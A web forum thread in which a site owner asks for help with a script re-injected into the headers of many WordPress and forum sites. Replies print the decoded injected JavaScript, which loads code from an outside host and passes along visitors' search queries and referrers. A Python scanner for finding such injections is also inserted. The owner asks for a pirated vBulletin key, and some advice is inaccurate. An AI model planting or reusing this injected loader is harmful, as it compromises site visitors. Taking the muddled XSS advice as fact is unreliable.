I have a number of sites and recently I have found this code within the header (top) of the site... of both WordPress sites and forums... SMF and vb.... The code seems to be injected within the WordPress "index.ini" files of each domain and also within "showthread.php" of the forums... Even after changing the "php" file, after some time it is reinserted. Can someone please tell me how I can correct or fix this issue?

<script>eval( unescape( "..." ));</script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

EXAMPLE http://www.iphone4gb.com
Well... I don't think this thread belongs in the PHP-forum, first and foremost. The script-tag contains the following code:

    if(!myik){
    var r=document.referrer,u=document.URL,t="",q,que,se="gb";
    if(r.indexOf("google.")!=-1){t="q";se="google";}
    if(r.indexOf("msn.")!=-1){t="q";se="msn";}
    if(r.indexOf("yahoo.")!=-1){t="p";se="yahoo";}
    if(r.indexOf("yandex.ru")!=-1){t="text";se="yandex.ru";}
    if(t.length&&((q=r.indexOf("?"+t+"="))!=-1||(q=r.indexOf("&"+t+"="))!=-1)){ que=r.substring(q+2+t.length).split("&")[0];
    if ((que.indexOf('site:')==-1) && (que.toLowerCase().indexOf('www.')==-1))
        document.write("<script src='http://best4you.if.ua/js/bidch.js?q="+que+"&ref="+r+"'></sc"+"ript>");
    }
    }
    var myik=true;

Although I don't really know what that code means, as I suck at Jscript. It should not be possible for the script-tag itself to "show up" on your pages, though, unless you have literally been hacked - i.e. someone's gotten access to your FTP-servers. Of course, it could be something added by add-ons, plugins or the like - that I wouldn't know about.
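The decoding step in the reply above can be done without running the injected script, and the same pattern can be used to list every file on a server that carries the wrapper. The following is an added example, not code posted by anyone in this thread; the sample files, the host `injected.example` and the function names are constructed for illustration.

```python
import os
import re
import tempfile
from urllib.parse import unquote

# Wrapper from the thread: <script>eval( unescape( "%69%66..." ));</script>
WRAPPER = re.compile(
    r"<script[^>]*>\s*eval\(\s*unescape\(\s*[\"']([^\"']+)[\"']\s*\)\s*\)\s*;?\s*</script>",
    re.IGNORECASE,
)
URL = re.compile(r"https?://[^\s'\"<>]+", re.IGNORECASE)
EXTENSIONS = (".php", ".html", ".htm", ".js", ".tpl", ".inc")


def decode_injections(text):
    """Statically decode each wrapper; returns [(decoded_source, [urls])]."""
    # unquote() covers %XX escapes only; JavaScript's unescape() also accepts %uXXXX.
    return [(src, URL.findall(src))
            for src in (unquote(m.group(1)) for m in WRAPPER.finditer(text))]


def scan_tree(root):
    """Walk a web root; return sorted (relative_path, mtime, urls) per infected file."""
    report = []
    for folder, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(EXTENSIONS):
                continue
            path = os.path.join(folder, name)
            with open(path, encoding="utf-8", errors="replace") as handle:
                hits = decode_injections(handle.read())
            if hits:
                urls = sorted({u for _src, found in hits for u in found})
                report.append((os.path.relpath(path, root), os.path.getmtime(path), urls))
    return sorted(report)


def demo():
    """Constructed sample tree: one clean file, one with an injected header."""
    js = "document.write(\"<script src='http://injected.example/x.js'></sc\"+\"ript>\");"
    encoded = "".join("%%%02x" % byte for byte in js.encode())
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "index.php"), "w") as out:
            out.write('<script>eval( unescape( "%s" ));</script><!DOCTYPE html>\n' % encoded)
        with open(os.path.join(root, "clean.php"), "w") as out:
            out.write("<?php echo 'hello'; ?>\n")
        return [(path, urls) for path, _mtime, urls in scan_tree(root)]


if __name__ == "__main__":
    for path, urls in demo():
        print(path, urls)
```

The modification time returned by `scan_tree` shows when each file was last rewritten, which can be matched against FTP and web server access logs to see how the code is being reinserted.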
It's XSS, aka cross-site scripting. There might be a vulnerability in your forum or WP. Try upgrading it. Also double-check all your passwords.
"Try password protecting the administration section." Yes can you tell me more.... I do have a password on the ADMIN access.... I do have passwords on userid .... WHAT do you mean ... "protecting the administration section." what step by step would I have to do
I hate to say it but I have a few vb Nulled ... DGT.... however I have about 100 different sites... in WP, SMF, VB ...joomla... where do I start ???? please help I find myself changing the index.php...uploading a backup to correct the problem ... then the code is back in a few hours. ???? what to do ???
This is very RIGHT... It has migrated to many other subdomains.... How ...How do I end it ... stop it ... ??? htaccess, php.ini ???? what will stop ... should I delete the nulled forum ??? all other domains WP, SMF ... have the code >>> please help
Lock your domains ( public_html or domain sub-path ) by adding "password protected directory" ! While they are locked, you can start fixing your files ..
.. thanks for your suggestion....I have been stressed with this issue lock within the cpanel.... ... ----I FOUND it ... How do I find this cross site scripting.... how do I fix this issue with many sites... ??? can someone direct me to a new vb key or null I can replace with what I have. userID+gmail
Well, the easiest way would be to replace all files with the default ones ( from your backup ) ! Cross-site-scripting does not involve databases, so .. should not be too hard to do this step.
Brother, I'm following your instructions. Thanks so much for the advice. After complete.. what should be the next step? How do I remove the problem?.... How do I isolate where the problem is ... I don't believe it is with the WordPress domains, 72 of them. Where or how does this script get injected ??
Lately, many of 2.7 ( WP version ) blogs were hacked ! Check their ( WP ) forum - maybe there's some useful information available. Code can be injected wherever your script does not convert/check users messages/comments ( should display as a plain text, without possible code execution ). The one and only real option to avoid future hacking is to upgrade your blogs to the latest available version !